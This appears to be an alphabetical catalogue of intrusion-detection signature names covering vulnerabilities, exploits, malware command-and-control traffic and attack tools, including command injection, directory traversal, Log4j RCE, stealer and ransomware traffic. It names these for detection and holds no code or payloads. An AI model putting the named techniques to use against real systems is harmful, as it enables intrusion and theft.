Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write
Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection
Laquis-Scada-Web-Server-Directory-Traversal
Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection
Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection
Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection
Laravel-Remote-Code-Execution-CVE-2018-15133
Large-Content-Length-Value
Launch-Command-In-PDF
LB-Link-Command-Injection-CVE-2023-26801
LCDproc-Multiple-Buffer-Overflow-Vulnerabilities
LCDproc-Parse_All_Client_Messages-Buffer-Overflow
LCDproc-Test_Func-Format-String-Vulnerability
LDAP-IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow
LDAP-IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow
LDAP-LSASS-Heap-Overflow-CVE-2010-0820
LDAP-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow
LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free
LDAP-OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service
LDAP-OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service
LDAP-Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service
LDAP-Sun-Directory-Server-LDAP-DOS
Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
LeapWare-LeapFTP-Pasv-Reply-Buffer-Overflow
Legacy-Chakra-Based-Microsoft-Edge-Usage
Lethic
Lets-Encrypt-Signed-Certificate
Lexmark-Device-Embedded-Web-Server-RCE
Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal
Lexmark-Markvision-Enterprise-Remote-Code-Execution
LG-LED-Assistant-API-Changepw-Unverified-Password-Reset
LG-LED-Assistant-API-Thumbnail-Directory-Traversal
LG-LED-Assistant-Setthumbnailrc-Directory-Traversal
LG-LED-Assistant-Updatefile-Directory-Traversal
LG-LED-Assistant-Upload-Directory-Traversal
LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839
LG-Simple-Editor-Command-Injection-CVE-2023-40504
LG-Simple-Editor-Copystickercontent-Directory-Traversal
LG-Simple-Editor-Copytemplateall-Directory-Traversal
LG-Simple-Editor-Cropimage-Directory-Traversal
LG-Simple-Editor-Deletechecksession-Directory-Traversal
LG-Simple-Editor-Deletefolder-Directory-Traversal
LG-Simple-Editor-Remote-Code-Execution
LG-Simple-Editor-Savexml-Directory-Traversal
Lianja-SQL-DbNetserver-Stack-Buffer-Overflow
Libav-LZO-Integer-Overflow
Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641
Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow
Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One
Libpng-Library-tRNS-sBIT-hIST-Chunk-Handling-BOF
Libpng-PNG-Decompress-Chunk-Integer-Overflow
Libpng-PNG-Inflate-Buffer-Overflow
LibreNMS-Aboutcontroller.php-Command-Injection
LibreNMS-addhost-Command-Injection
LibreNMS-Address-Search-Address-SQL-Injection
LibreNMS-Alert-Rule-Name-Stored-Cross-Site-Scripting
LibreNMS-API-Token-Stored-Cross-Site-Scripting
LibreNMS-API_Functions-List_Devices-Order-SQL-Injection
LibreNMS-Authenticated-Command-Injection-CVE-2024-51092
LibreNMS-Bills-Information-Stored-Cross-Site-Scripting
LibreNMS-Collectd-Command-Injection
LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457
LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-XSS-CVE-2025-23200
LibreNMS-Device-Overview-Stored-Cross-Site-Scripting
LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199
LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting
LibreNMS-Health-View-Reflected-Cross-Site-Scripting
LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting
LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting
LibreNMS-Packages.inc.php-Package-Name-SQL-Injection
LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting
LibreNMS-ServiceTemplateController.php-Name-Stored-CSS
LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting
LibreOffice-And-OpenOffice-ODF-Document-Printersetup-Integer-Underflow
LibreOffice-EmbeddedFontsHelper-Directory-Traversal-CVE-2024-12425
LibreOffice-Hsqldb-Arbitrary-File-Write
LibreOffice-Librelogo-Arbitrary-Code-Execution
LibreOffice-Macro-Event-Remote-Code-Execution
LibreOffice-RTF-Parser-Use-After-Free
LibreOffice-Webservice-Information-Disclosure
Libsndfile-PAF-File-Integer-Overflow
Libspf2-Macro-Expansion-Integer-Underflow
Libtiff-Jbigdecode-Heap-Buffer-Overflow
Libtiff-Tiff2pdf-Converter-Out-Of-Bounds-Read
Libupnp-Device-Service-Name-Stack-Buffer-Overflow
Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow
Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow
Libvnc-LibVNCClient-Heap-Based-Buffer-Overflow
Libvnc-Libvncserver-Divide-By-Zero-Denial-Of-Service
Libvnc-Libvncserver-Tight-File-Transfer-Extension-Use-After-Free
Libvncserver-File-Transfer-Extension-Heap-Based-Buffer-Overflow
Libvncserver-LibvVNCClient-Framebufferupdate-Rectangle-Heap-Buffer-Overflow
Libvncserver-Rfbprocessclientnormalmessage-Divide-By-Zero-Denial-Of-Service
Libvpx-Heap-Buffer-Overflow-CVE-2023-5217
Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow
Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961
Liferay-Portal-User-Account-Stored-Cross-Site-Scripting
Lifesize-Room-Command-Execution
LightOpenCMS-Smarty.php-Local-File-Inclusion
Lighttpd-Connection-Header-Parsing-Denial-Of-Service
Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service
Lighttpd-Host-Header-Mod_mysql_vhost-SQL-Injection
Lighttpd-Host-Header-Mod_Simple_vhost-Directory-Traversal
Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service
Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability
Lighttpd-Url-Path-2f-Decode-Denial-Of-Service
LimeSurvey-Zip-Path-Traversals
Limewire-Peer-To-Peer-Network-Usage
Linear-eMerge-E3-Series-Access-Controller-Command-Injection
Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441
LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF
Linksys-Routers-Remode-Code-Execution-Vulnerability
Linksys-WAP610N-Unauthenticated-Root-Access
Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service
Linksys-WRT110-Remote-Command-Execution
Linksys-WRT54-Buffer-Overflow
Linux-Backdoor-C2-Traffic
Linux-Download-Commands-In-Parameter-Values
Linux-Esxiargs-Ransomware
Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS
Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow
Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service
Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service
Linux-Kernel-IPv6-Netfilter-Nf_CT_frag6_reasm-Null-Pointer-Dereference-DoS
Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service
Linux-Kernel-iSCSI_Add_Notunderstood_Response-Heap-Buffer-Overflow
Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write
Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure
Linux-Kernel-Ksmbd-Mech-Token-Out-of-Bounds-Read-Vulnerability
Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow
Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure
Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference
Linux-Kernel-Ksmbd-SMB2_Negotiate-Handling-Denial-Of-Service
Linux-Kernel-Ksmbd-SMB2_Query_Info-Handling-Null-Pointer-Dereference
Linux-Kernel-Ksmbd-SMB2_Session_Setup-Handling-Memory-Exhaustion
Linux-Kernel-Ksmbd-SMB2_Tree_Connect-Handling-Out-Of-Bounds-Read
Linux-Kernel-Ksmbd_Decode_NTLMSSP_Auth_Blob-Integer-Underflow
Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error
Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow
Linux-Kernel-Netfilter-SCTP-Unknown-Chunk-Types-Denial-Of-Service
Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass
Linux-Kernel-Nfsd-Heap-Buffer-Overflow
Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow
Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service
Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service
Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service
Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow
Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference
Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read
Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow
Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886
Linux-Kernel-TIPC-Heap-Buffer-Overflow
Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435
Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service
LinuxKI-Toolset-Remote-Code-Execution
Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
Listrec-Pl-Vulnerability
LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000
LiteSpeed-Web-Server-Source-Code-Disclosure
Livinston-Telnet-Reboot
LoadRunner-magentproc.exe-Stack-Buffer-Overflow
Local-System-Access-Via-ActiveX-Controls
Locky-B-Control-Traffic
Log4j-Denial-of-Service-CVE-2021-45105
Log4j-Remote-Code-Execution
Logback-Remote-Code-Execution
Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
LogPOS-Malware
Logsign-Remote-Command-Injection
Logsign-Unified-Secops-Authentication-Failure
Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721
LOIC-DoS-Tool
Loki-Bot-C2-Traffic
Loki-RAT
Lolibotinc-Botnet
Long-Basic-Authorization-Header
Long-Domain-Name-Redirect
Long-Domain-Name-With-Mixed-Letters-And-Digits
Loop-Denial-Of-Service-CVE-2024-2169
Lop
LordEK-Traffic
Lotus-Domino-Directory-Traversal
Lotus-Domino-HTTP-Server-Msdos-Device-Name-DoS
Lotus-Domino-IMAP-Server-Cram-md5-Authentication-Buffer-Overflow
Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
Lotus-Notes-URI-Handler-Argument-Injection
LPD-SAPlpd-Multiple-Commands-Buffer-Overflow
Lpd-Sendmail-System-Compromise
Lprng-Format-String-Vulnerability
Lucee-Administrator-imgProcess-Arbitrary-File-Write
Lucee-Authenticated-Scheduled-Job-Code-Execution
LuminosityLink-RAT-C2-Traffic
Lumma-Stealer-C2-Activity
Maarch-LetterBox-Unrestricted-File-Upload
Maazben-Bot
Mac-OS-X-Dmg-UFS-ffs_mountfs-Integer-Overflow
Macontrol
MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657
Macromedia-Flash-Media-Server-Administration-Service-Denial-of-Service
Macromedia-Flash-Player-LoadMovie-DoS
Macromedia-JRun-Server-File-Disclosure
Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
Magecart-Code-Injection
Magento-API-Unserialize-Remote-Code-Execution
Magento-Forwarded-Parameter-Authentication-Bypass
Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery
Magic-Winmail-Server-Pass-Format-String-Vuln
MagnusBilling-Application-Unauthenticated-Remote-Command-Execution
Mahdi
Mail-Manage-EX-Php-Include-Exploit
MailCarrier-Buffer-Overflow
Mailcleaner-Remote-Code-Execution
MailEnable-HTTP-Authorization-Header-Buffer-Overflow
MailEnable-Professional-1.54-Buffer-Overflow
MailEnable-SMTP-Mailto-Format-String
MailEnable-SMTP-NTLM-Authentication-Buffer-Overflow
MailEnable-W3C-Logging-Buffer-Overflow
Mailnews-Cgi-System-Compromise
Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting
MajorDoMo-Command-Injection
Majordomo2-Directory-Traversal
Mako-Server-Remote-Command-Injection
Malicious-Ico-File-Used-By-Trojans
Malicious-Internet-Shortcut-File
Malicious-Java-Applet-Reference
Malicious-JavaScript-In-PDF
Malicious-KiXtart-Script-Infection-Traffic
Malicious-Obfuscation-JavaScript-VBScript-HTML
Malicious-Obfuscation-Reversed-PowerShell
Malicious-Site-Using-ClickFix-Technique
Malicious-VBScript-Execution
Malicious_Download_Redirect
Malicious_Redirection_Detected
Maltrail-Unauthenticated-Command-Injection
Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
Mambo-Globals-Php-MosConfig-Live-Site-Compromise
Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE
Manageengine-Adselfservice-Plus-Custom-Script-Execution
Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection
Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-SQL-Injection
Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-SQL-Injection
Manageengine-Applications-Manager-Commonapiutil-SQL-Injection
Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection
Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection
Manageengine-Applications-Manager-Remote-Code-Execution
Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass
Manageengine-Desktop-Central-Java-Deserialization
Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal
Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload
Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload
Manageengine-Desktop-Central-Statusupdateservlet-Filename-Directory-Traversal
Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset
Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload
Manageengine-Desktopcentral-SQL-Injection
Manageengine-DeviceExpert-User-Credentials-Disclosure
Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure
Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal
Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery
Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure
Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection
Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection
Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution
Manageengine-Multiple-Products-Failoverhelperservlet-Information-Disclosure
Manageengine-Multiple-Products-File-Attachment-Directory-Traversal
Manageengine-Multiple-Products-Filecollector-Directory-Traversal
Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal
Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection
Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal
Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Vulnerability
Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download
Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal
Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection
Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection
Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection
Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078
Manageengine-Opmanager-SubmitQuery-IntegrationUser-Hidden-Administrator-Account
Manageengine-Password-Manager-Pro-SQL-Injection
Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163
Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection
Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure
Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal
Manageengine-Servicedesk-File-Upload-Directory-Traversal
Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal
Manageengine-Servicedesk-Plus-User-Privileges-Bypass
Mango-Automation-Scada/Hmi-Cross-Site-Scripting
Manjusaka-C2-GET-Request
Manolito-Peer-To-Peer-Network-Usage
Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting
Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset
Mantis-MantisBT-Bug-Tracker-Config_Report-Move_Attachments_Page-XSS
MantisBT-Admin-SQL-Injection
MantisBT-XmlImportExport-PHP-Code-Injection
Manutharcs-Botnet
Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
MaraCMS-Arbitrary-PHP-File-Upload
Marketscore-OSSProxy-Internet-Accelerator-User-Agent
Maze-Ransomware-Traffic
McAfee-Asset-Manager-Downloadreport-Information-Disclosure
McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error
McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal
McAfee-e-Business-Server-Authentication-Buffer-Overflow
McAfee-e-Business-Server-Authentication-Remote-Code-Execution
McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow
McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection
McAfee-Epolicy-Orchestrator-Framework-Services-Format-String
McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting
McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection
McAfee-Epolicy-Orchestrator-XML-Entity-Injection
McAfee-Epolicy-Orchestrator-Xml-External-Entity
McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
McAfee-FreeScan-Information-Disclosure
McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow
McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite
McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure
McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method
McAfee-Virtual-Technician-Remote-Code-Execution
McAfee-VirusScan-On-Access-Scanner-Long-Unicode-Filename-Handling
McAfee-Web-Reporter-Jboss-Ejbinvokerservlet-Marshalled-Object-Code-Execution
Mcrat-Botnet
MDaemon-IMAP-Command-Buffer-Overflow
MDaemon-IMAP-Status-Command-BOF
MDaemon-Raw-Message-Handler-Buffer-Overflow
MDaemon-SMTP-Command-Buffer-Overflow
Measuresoft-ScadaPro-Directory-Traversal
Measuresoft-ScadaPro-Remote-Code-Execution
Measuresoft-ScadaPro-XF-Command-Execution
Media-Foundation-Memory-Corruption-CVE-2018-8251
Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225
Media-Services-Buffer-Overflow-CVE-2010-0478
MediaWiki-CSS-Extension-Path-Traversal
MediaWiki-Script-Injection
MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability
MediaWiki-URI-Remote-Command-Execution
MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085
Memcached-Denial-Of-Service
Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service
Memcached-Process_Bin_Append_Prepend-Integer-Overflow
Memcached-Process_Bin_SASL_Auth-Integer-Underflow
Memcached-Process_Bin_Update-Body_Len-Integer-Overflow
Memcached-Traffic-Amplification-UDP-Packet-Spoofing
Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow
Memcached-Usage
Mercantec-SoftCart-Cgi-Buffer-Overflow
Mercury-Mail-Multiple-IMAP-Commands-BOF
Metabase-GeoJSON-URL-Local-File-Inclusion
Metabase-Remote-Code-Execution-CVE-2023-38646
Metamail-Format-String-Vulnerabilities
Metasploit-Handler-DoS
Metasploit-JavaScript-Encryption
Metasploit-JavaScript-Escape-Evasion
Metasploit-msfd-Browser-Remote-Code-Execution
Metasploit-msfd-Remote-Code-Execution
Metersphere-V1.15.4-Authenticated-SQL-Injection
MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting
Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow
Micro-Focus-NetIQ-Access-Manager-Identity-Server-Directory-Traversal
Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal
Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass
Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE
Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection
Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption
Micro-Focus-Secure-Messaging-Gateway-Command-Injection
Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection
Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE
Microsoft-.NET-FormatFtpCommand-Crlf-Injection-Arbitrary-File-Write-And-Deletion
Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015
Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059
Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution
Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow
Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
Microsoft-.NET-Framework-Winforms-Buffer-Overflow
Microsoft-.NET-Framework-Winforms-Information-Disclosure
Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption
Microsoft-.NET-Framework-Xml-Digital-Signature-Spoofing
Microsoft-.NET-Framework-Xml-Signature-Validation-Entity-Expansion-DOS
Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution
Microsoft-.NET-Privilege-Escalation-CVE-2015-6096
Microsoft-Access-CVE-2013-3157-Memory-Corruption
Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege
Microsoft-Active-Directory-Federation-Services-Code-Execution
Microsoft-Active-Directory-Federation-Services-Information-Disclosure
Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757
Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service
Microsoft-Active-Template-Library-Remote-Code-Execution-MS09-060
Microsoft-ActiveX-Code-Execution-CVE-2012-0158
Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption
Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509
Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow
Microsoft-Anti-XSS-Library-Bypass-Vulnerability
Microsoft-ASP.NET-Error-Handling-Denial-Of-Service
Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege
Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect
Microsoft-ASP.NET-Hash-Collision-Denial-Of-Service
Microsoft-ASP.NET-Information-Disclosure-CVE-2010-3332
Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability
Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure
Microsoft-ASP.NET-ViewState-Denial-Of-Service
Microsoft-ATL-COM-Initialization
Microsoft-ATL-Uninitialized-Object
Microsoft-Authentication-Failure
Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass
Microsoft-Browser-Memory-Corruption-CVE-2016-0105
Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion
Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
Microsoft-CAPICOM-Utilities-ActiveX-Control-Integer-Overflow-Denial-Of-Service
Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977
Microsoft-Color-Management-Module-Buffer-Overflow
Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow
Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468
Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
Microsoft-Defender-Remote-Code-Execution
Microsoft-Defender-Remote-Code-Execution-Vulnerability-CVE-2021-1647
Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231
Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
Microsoft-Direct2d-SVG-Path-Memory-Corruption
Microsoft-DirectPlay-Denial-Of-Service
Microsoft-DirectPlay-Heap-Overflow-Vulnerability
Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
Microsoft-DirectShow-Heap-Overflow
Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption
Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption
Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption
Microsoft-DirectShow-Remote-Code-Execution
Microsoft-DirectX-Sami-File-Parsing-Code-Execution
Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
Microsoft-DNS-Server-Any-Query-Cache-Weakness
Microsoft-DNS-Server-Denial-of-Service
Microsoft-DNS-Server-WPAD-Registration-Spoofing
Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability
Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow
Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free
Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529
Microsoft-Edge-Array.join-Type-Confusion
Microsoft-Edge-Asm.js-Type-Confusion
Microsoft-Edge-Asmjsinterpreter-Use-After-Free
Microsoft-Edge-Boxstackinstance-Type-Confusion
Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642
Microsoft-Edge-Chakra-Arguments-Off-By-One
Microsoft-Edge-Chakra-Array.map-Type-Confusion
Microsoft-Edge-Chakra-Array.shift-Type-Confusion
Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion
Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow
Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641
Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion
Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption
Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow
Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion
Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion
Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion
Microsoft-Edge-Chakra-OP_memset-Type-Confusion
Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466
Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467
Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion
Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion
Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit
Microsoft-Edge-Code-Execution-CVE-2015-6168
Microsoft-Edge-Code-Execution-CVE-2015-6170
Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read
Microsoft-Edge-CVE-2015-2442
Microsoft-Edge-CVE-2015-2446
Microsoft-Edge-CVE-2015-6064
Microsoft-Edge-CVE-2016-0003-Type-Confusion
Microsoft-Edge-CVE-2016-0161-Privilege-Escalation
Microsoft-Edge-CVE-2016-3222-Memory-Corruption
Microsoft-Edge-CVE-2016-3244-Information-Disclosure
Microsoft-Edge-CVE-2016-7200
Microsoft-Edge-CVE-2016-7206
Microsoft-Edge-CVE-2016-7242
Microsoft-Edge-CVE-2016-7286-Memory-Corruption
Microsoft-Edge-CVE-2016-7287
Microsoft-Edge-CVE-2017-0023
Microsoft-Edge-CVE-2017-0065-Information-Disclosure
Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free
Microsoft-Edge-CVE-2017-8652-Use-After-Free
Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass
Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read
Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566
Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass
Microsoft-Edge-Information-Disclosure-CVE-2018-8545
Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277
Microsoft-Edge-InstanceOf-Type-Confusion
Microsoft-Edge-JavaScript-Engine-Memory-Corruption
